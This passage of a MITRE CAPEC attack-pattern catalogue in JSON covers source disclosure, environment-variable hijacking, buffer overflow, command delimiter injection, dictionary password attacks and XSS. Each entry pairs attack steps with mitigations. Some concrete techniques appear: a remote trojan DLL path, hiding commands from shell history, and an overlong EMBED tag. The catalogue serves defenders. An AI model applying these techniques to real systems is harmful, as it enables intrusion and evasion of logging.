configuration information, source, or binary data",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":"Implementation: Server routines should be determined by content not determined by filename or file extension."},"Example_Instances":{"Example":{"p":["J2EE application servers are supposed to execute Java Server Pages (JSP). There have been disclosure issues relating to Orion Application Server, where an attacker that appends either a period (.) or space characters to the end of a legitimate Http request, then the server displays the full source code in the attackers\' web browser.","Since remote data and directory access may be accessed directly from the JSP, this is a potentially very serious issue.","[REF-6]"],"div":["http://victim.site/login.jsp.",{"style":"margin-left:10px;","class":"attack"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"430"}},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-6"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"}]}},"12":{"ID":"12","Name":"Choosing Message Identifier","Abstraction":"Standard","Status":"Draft","Description":"This pattern of attack is defined by the selection of messages distributed over via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary\'s identifier to more a privileged one.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"PeerOf","CAPEC_ID":"21"},{"Nature":"ChildOf","CAPEC_ID":"216"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Determine the nature of messages being transported as well as the identifiers to be used as part of the attack"},{"Step":"2","Phase":"Experiment","Description":"If required, authenticate to the distribution channel"},{"Step":"3","Phase":"Experiment","Description":"If any particular client\'s information is available through the transport means simply by selecting a particular identifier, an attacker can simply provide that particular identifier."},{"Step":"4","Phase":"Experiment","Description":"Attackers with client access connecting to output channels could change their channel identifier and see someone else\'s (perhaps more privileged) data."}]},"Prerequisites":{"Prerequisite":["Information and client-sensitive (and client-specific) data must be present through a distribution channel available to all users.","Distribution means must code (through channel, message identifiers, or convention) message destination in a manner visible within the distribution means itself (such as a control channel) or in the messages themselves."]},"Skills_Required":{"Skill":["All the attacker needs to discover is the format of the messages on the channel/distribution means and the particular identifier used within the messages.",{"Level":"Low"}]},"Resources_Required":{"Resource":"The Attacker needs the ability to control source code or application configuration responsible for selecting which message/channel id is absorbed from the public distribution means."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":[{"p":["Associate some ACL (in the form of a token) with an authenticated user which they provide middleware. The middleware uses this token as part of its channel/message selection for that client, or part of a discerning authorization decision for privileged channels/messages.","The purpose is to architect the system in a way that associates proper authentication/authorization with each channel/message."]},"Re-architect system input/output channels as appropriate to distribute self-protecting data. That is, encrypt (or otherwise protect) channels/messages so that only authorized readers can see them."]},"Example_Instances":{"Example":"A certain B2B interface on a large application codes for messages passed over an MQSeries queue, on a single \\"Partners\\" channel. Messages on that channel code for their client destination based on a partner_ID field, held by each message. That field is a simple integer. Attackers having access to that channel, perhaps a particularly nosey partner, can simply choose to store messages of another partner\'s ID and read them as they desire. Note that authentication does not prevent a partner from leveraging this attack on other partners. It simply disallows Attackers without partner status from conducting this attack."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"201"},{"CWE_ID":"306"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary"},"Previous_Entry_Name":["Choosing a Message/Channel Identifier on a Public/Multicast Channel",{"Date":"2015-12-07"}]}},"13":{"ID":"13","Name":"Subverting Environment Variable Values","Abstraction":"Detailed","Status":"Stable","Description":"The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker\'s goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"77"},{"Nature":"CanPrecede","CAPEC_ID":"14"},{"Nature":"PeerOf","CAPEC_ID":"10"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The attacker probes the application for information. Which version of the application is running? Are there known environment variables? etc."},{"Step":"2","Phase":"Experiment","Description":"The attacker gains control of an environment variable and ties to find out what process(es) the environment variable controls."},{"Step":"3","Phase":"Exploit","Description":"The attacker modifies the environment variable to abuse the normal flow of processes or to gain access to privileged resources."}]},"Prerequisites":{"Prerequisite":["An environment variable is accessible to the user.","An environment variable used by the application can be tainted with user supplied data.","Input data used in an environment variable is not validated properly.","The variables encapsulation is not done properly. For instance setting a variable as public in a class makes it visible and an attacker may attempt to manipulate that variable."]},"Skills_Required":{"Skill":["In a web based scenario, the client controls the data that it submitted to the server. So anybody can try to send malicious data and try to bypass the authentication mechanism.",{"Level":"Low"},"Some more advanced attacks may require knowledge about protocols and probing technique which help controlling a variable. The malicious user may try to understand the authentication mechanism in order to defeat it.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Accountability","Impact":"Hide Activities"}]},"Mitigations":{"Mitigation":["Protect environment variables against unauthorized read and write access.","Protect the configuration files which contain environment variables against illegitimate read and write access.","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system.","Apply the least privilege principles. If a process has no legitimate reason to read an environment variable do not give that privilege."]},"Example_Instances":{"Example":["Changing the LD_LIBRARY_PATH environment variable in TELNET will cause TELNET to use an alternate (possibly Trojan) version of a function library. The Trojan library must be accessible using the target file system and should include Trojan code that will allow the user to log in with a bad password. This requires that the attacker upload the Trojan library to a specific location on the target. As an alternative to uploading a Trojan file, some file systems support file paths that include remote addresses, such as \\\\\\\\172.16.2.100\\\\shared_files\\\\trojan_dll.dll. See also: Path Manipulation (CVE-1999-0073)","The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \\"ignorespace\\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \\"ignoredups\\". In some Linux systems, this is set by default to \\"ignoreboth\\" which covers both of the previous examples. This means that \\" ls\\" will not be saved, but \\"ls\\" would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"353"},{"CWE_ID":"285"},{"CWE_ID":"302"},{"CWE_ID":"74"},{"CWE_ID":"15"},{"CWE_ID":"73"},{"CWE_ID":"20"},{"CWE_ID":"200"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1562.003","Entry_Name":"Impair Defenses:Impair Command History Logging"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.006","Entry_Name":"Hijack Execution Flow:Dynamic Linker Hijacking"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.007","Entry_Name":"Hijack Execution Flow:Path Interception by PATH Environment Variable"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Examples-Instances, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Mitigations, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"14":{"ID":"14","Name":"Client-side Injection-induced Buffer Overflow","Abstraction":"Detailed","Status":"Draft","Description":"This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service. This hostile service is created to deliver the correct content to the client software. For example, if the client-side application is a browser, the service will host a webpage that the browser loads.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target client-side application] The adversary identifies a target client-side application to perform the buffer overflow on. The most common are browsers. If there is a known browser vulnerability an adversary could target that."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer.","Technique":["Many times client side applications will be open source, so an adversary can examine the source code to identify possible injection vectors.","Examine APIs of the client-side application and look for areas where a buffer overflow might be possible."]},{"Step":"3","Phase":"Experiment","Description":"[Create hostile service] The adversary creates a hostile service that will deliver content to the client-side application. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary\'s choosing.","Technique":["If the client-side application is a browser, the adversary will create a service that delivers a malicious webpage to the browser.","Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the injection vector, the adversary delivers the content to the client-side application using the hostile service and overflows the buffer.","Technique":["If the adversary is targeting a local client-side application, they just need to use the service themselves.","If the adversary is attempting to cause an overflow on an external user\'s client-side application, they must get the user to attach to their service by some other means. This could be getting a user to visit their hostile webpage to target a user\'s browser."]}]},"Prerequisites":{"Prerequisite":["The targeted client software communicates with an external server.","The targeted client software has a buffer overflow vulnerability."]},"Skills_Required":{"Skill":["To achieve a denial of service, an attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap requires a more in-depth knowledge and higher skill level.",{"Level":"High"}]},"Indicators":{"Indicator":"An example of indicator is when the client software crashes after executing code downloaded from a hostile server."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["The client software should not install untrusted code from a non-authenticated server.","The client software should have the latest patches and should be audited for vulnerabilities before being used to communicate with potentially hostile servers.","Perform input validation for length of buffer inputs.","Use a language or compiler that performs automatic bounds checking.","Use an abstraction library to abstract away risky APIs. Not a complete solution.","Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Ensure all buffer uses are consistently bounds-checked.","Use OS-level preventative functionality. Not a complete solution."]},"Example_Instances":{"Example":{"div":["Attack Example: Buffer Overflow in Internet Explorer 4.0 Via EMBED Tag",{"style":"color:#32498D; font-weight:bold;"},"<EMBED TYPE=\\"audio/midi\\" SRC=\\"/path/file.mid\\" AUTOSTART=\\"true\\">",{"style":"margin-left:10px;","class":"informative"}],"p":["Authors often use <EMBED> tags in HTML documents. For example","If an attacker supplies an overly long path in the SRC= directive, the mshtml.dll component will suffer a buffer overflow. This is a standard example of content in a Web page being directed to exploit a faulty module in the system. There are potentially thousands of different ways data can propagate into a given system, thus these kinds of attacks will continue to be found in the wild."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"353"},{"CWE_ID":"118"},{"CWE_ID":"119"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"15":{"ID":"15","Name":"Command Delimiters","Abstraction":"Standard","Status":"Draft","Description":"An attack of this type exploits a programs\' vulnerabilities that allows an attacker\'s commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"137","Exclude_Related":{"Exclude_ID":"403"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Assess Target Runtime Environment] In situations where the runtime environment is not implicitly known, the attacker makes connections to the target system and tries to determine the system\'s runtime environment. Knowing the environment is vital to choosing the correct delimiters.","Technique":["Port mapping using network connection-based software (e.g., nmap, nessus, etc.)","Port mapping by exploring the operating system (netstat, sockstat, etc.)","TCP/IP Fingerprinting","Induce errors to find informative error messages"]},{"Step":"2","Phase":"Explore","Description":"[Survey the Application] The attacker surveys the target application, possibly as a valid and authenticated user","Technique":["Spidering web sites for all available links","Inventory all application inputs"]},{"Step":"3","Phase":"Experiment","Description":"[Attempt delimiters in inputs] The attacker systematically attempts variations of delimiters on known inputs, observing the application\'s response each time.","Technique":["Inject command delimiters using network packet injection tools (netcat, nemesis, etc.)","Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.)","Enter command delimiters directly in input fields."]},{"Step":"4","Phase":"Exploit","Description":"[Use malicious command delimiters] The attacker uses combinations of payload and carefully placed command delimiters to attack the software."}]},"Prerequisites":{"Prerequisite":"Software\'s input validation or filtering must not detect and block presence of additional malicious command."},"Skills_Required":{"Skill":["The attacker has to identify injection vector, identify the specific commands, and optionally collect the output, i.e. from an interactive session.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design: Perform allowlist validation against a positive specification for command length, type, and parameters.","Design: Limit program privileges, so if commands circumvent program input validation or filter routines then commands do not running under a privileged account","Implementation: Perform input validation for all remote content.","Implementation: Use type conversions such as JDBC prepared statements."]},"Example_Instances":{"Example":{"p":["By appending special characters, such as a semicolon or other commands that are executed by the target process, the attacker is able to execute a wide variety of malicious commands in the target process space, utilizing the target\'s inherited permissions, against any resource the host has access to. The possibilities are vast including injection attacks against RDBMS (SQL Injection), directory servers (LDAP Injection), XML documents (XPath and XQuery Injection), and command line shells. In many injection attacks, the results are converted back to strings and displayed to the client process such as a web browser without tripping any security alarms, so the network firewall does not log any out of the ordinary behavior.","LDAP servers house critical identity assets such as user, profile, password, and group information that is used to authenticate and authorize users. An attacker that can query the directory at will and execute custom commands against the directory server is literally working with the keys to the kingdom in many enterprises. When user, organizational units, and other directory objects are queried by building the query string directly from user input with no validation, or other conversion, then the attacker has the ability to use any LDAP commands to query, filter, list, and crawl against the LDAP server directly in the same manner as SQL injection gives the ability to the attacker to run SQL commands on the database."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"146"},{"CWE_ID":"77"},{"CWE_ID":"184"},{"CWE_ID":"78"},{"CWE_ID":"185"},{"CWE_ID":"93"},{"CWE_ID":"140"},{"CWE_ID":"157"},{"CWE_ID":"138"},{"CWE_ID":"154"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"16":{"ID":"16","Name":"Dictionary-based Password Attack","Abstraction":"Detailed","Status":"Draft","Description":{"p":["An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user\'s account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.","Dictionary Attacks differ from similar attacks such as Password Spraying (CAPEC-565) and Credential Stuffing (CAPEC-600), since they leverage unknown username/password combinations and don\'t care about inducing account lockouts."]},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"49"},{"Nature":"CanPrecede","CAPEC_ID":"600"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"560"},{"Nature":"CanPrecede","CAPEC_ID":"561"},{"Nature":"CanPrecede","CAPEC_ID":"653"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine application\'s/system\'s password policy] Determine the password policies of the target application/system.","Technique":["Determine minimum and maximum allowed password lengths.","Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).","Determine account lockout policy (a strict account lockout policy will prevent brute force attacks)."]},{"Step":"2","Phase":"Explore","Description":"[Select dictionaries] Pick the dictionaries to be used in the attack (e.g. different languages, specific terminology, etc.)","Technique":["Select dictionary based on particular users\' preferred languages.","Select dictionary based on the application/system\'s supported languages."]},{"Step":"3","Phase":"Explore","Description":"[Determine username(s) to target] Determine username(s) whose passwords to crack.","Technique":["Obtain username(s) by sniffing network packets.","Obtain username(s) by querying application/system (e.g. if upon a failed login attempt, the system indicates whether the entered username was valid or not)","Obtain usernames from filesystem (e.g. list of directories in C:\\\\Documents and Settings\\\\ in Windows, and list in /etc/passwd in UNIX-like systems)"]},{"Step":"4","Phase":"Exploit","Description":"[Use dictionary to crack passwords.] Use a password cracking tool that will leverage the dictionary to feed passwords to the system and see if they work.","Technique":["Try all words in the dictionary, as well as common misspellings of the words as passwords for the chosen username(s).","Try common combinations of words in the dictionary, as well as common misspellings of the combinations as passwords for the chosen username(s)."]}]},"Prerequisites":{"Prerequisite":["The system uses one factor password based authentication.","The system does not have a sound password policy that is being enforced.","The system does not implement an effective password throttling mechanism."]},"Skills_Required":{"Skill":["A variety of password cracking tools and dictionaries are available to launch this type of an attack.",{"Level":"Low"}]},"Resources_Required":{"Resource":"A machine with sufficient resources for the job (e.g. CPU, RAM, HD). Applicable dictionaries are required. Also a password cracking tool or a custom script that leverages the dictionary database to launch the attack."},"Indicators":{"Indicator":"Many invalid login attempts are coming from the same machine (same IP address) or for the same log in name. The login attempts use passwords that are dictionary words."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Create a strong password policy and ensure that your system enforces this policy.","Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.","Leverage multi-factor authentication for all authentication services."]},"Example_Instances":{"Example":["A system user selects the word \\"treacherous\\" as their passwords believing that it would be very difficult to guess. The password-based dictionary attack is used to crack this password and gain access to the account.",{"p":["The Cisco LEAP challenge/response authentication mechanism uses passwords in a way that is susceptible to dictionary attacks, which makes it easier for remote attackers to gain privileges via brute force password guessing attacks.","Cisco LEAP is a mutual authentication algorithm that supports dynamic derivation of session keys. With Cisco LEAP, mutual authentication relies on a shared secret, the user\'s logon password (which is known by the client and the network), and is used to respond to challenges between the user and the Remote Authentication Dial-In User Service (RADIUS) server.","Methods exist for someone to write a tool to launch an offline dictionary attack on password-based authentications that leverage Microsoft MS-CHAP, such as Cisco LEAP. The tool leverages large password lists to efficiently launch offline dictionary attacks against LEAP user accounts, collected through passive sniffing or active techniques."]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"521"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"654"},{"CWE_ID":"307"},{"CWE_ID":"308"},{"CWE_ID":"309"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Description, Mitigations, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"17":{"ID":"17","Name":"Using Malicious Files","Abstraction":"Standard","Status":"Draft","Description":"An attack of this type exploits a system\'s configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"122"},{"Nature":"CanPrecede","CAPEC_ID":"233"}]},"Prerequisites":{"Prerequisite":"System\'s configuration must allow an attacker to directly access executable files or upload files to execute. This means that any access control system that is supposed to mediate communications between the subject and the object is set incorrectly or assumes a benign environment."},"Skills_Required":{"Skill":["To identify and execute against an over-privileged system interface",{"Level":"Low"}]},"Resources_Required":{"Resource":"Ability to communicate synchronously or asynchronously with server that publishes an over-privileged directory, program, or interface. Optionally, ability to capture output directly through synchronous communication or other method such as FTP."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege","Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.","Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables."]},"Example_Instances":{"Example":{"p":["Consider a directory on a web server with the following permissions","This could allow an attacker to both execute and upload and execute programs\' on the web server. This one vulnerability can be exploited by a threat to probe the system and identify additional vulnerabilities to exploit."],"div":["drwxrwxrwx 5 admin public 170 Nov 17 01:08 webroot",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"732"},{"CWE_ID":"285"},{"CWE_ID":"272"},{"CWE_ID":"59"},{"CWE_ID":"282"},{"CWE_ID":"270"},{"CWE_ID":"693"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.010","Entry_Name":"Hijack Execution Flow:Services File Permissions Weakness"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Accessing, Modifying or Executing Executable Files",{"Date":"2018-07-31"}]}},"18":{"ID":"18","Name":"XSS Targeting Non-Script Elements","Abstraction":"Detailed","Status":"Draft","Description":"This attack is a form of Cross-Site Scripting (XSS) where malicious scripts are embedded in elements that are not expected to host scripts such as image tags (<img>), comments in XML documents (< !-CDATA->), etc. These tags may not be subject to the same input validation, output validation, and other content filtering and checking routines, so this can create an opportunity for an attacker to tunnel through the application\'s elements and launch a XSS attack through other elements. As with all remote attacks, it is important to differentiate the ability to launch an attack (such as probing an internal network for unpatched servers) and the ability of the remote attacker to collect and interpret the output of said attack.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"592"},{"Nature":"ChildOf","CAPEC_ID":"588"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Spider] Using a browser or an automated tool, an attacker records all entry points for inputs that happen to be reflected in a client-side non-script element. These non-script elements can be located in the HTML content (head, body, comments), in an HTML tag, XML, CSS, etc.","Technique":["Use a spidering tool to follow and record all non-static links that are likely to have input parameters (through forms, URL, fragments, etc.) actively used by the Web application.","Use a proxy tool to record all links visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Probe identified potential entry points for XSS vulnerability] The attacker uses the entry points gathered in the \\"Explore\\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.","Technique":["Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side non-script elements context and observe system behavior to determine if script was executed. Since these probes may have to be injected in many different types of non-script elements, they should cover a variety of possible contexts (CSS, HTML tag, XML, etc.).","Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side non-script elements context and observe system behavior to determine if script was executed. Since these probes may have to be injected in many different types of non-script elements, they should cover a variety of possible contexts (CSS, HTML tag, XML, etc.).","Use a proxy tool to record results of the created requests."]},{"Step":"3","Phase":"Exploit","Description":"[Steal session IDs, credentials, page content, etc.] As the attacker succeeds in exploiting the vulnerability, they can choose to steal user\'s credentials in order to reuse or to analyze them later on.","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and 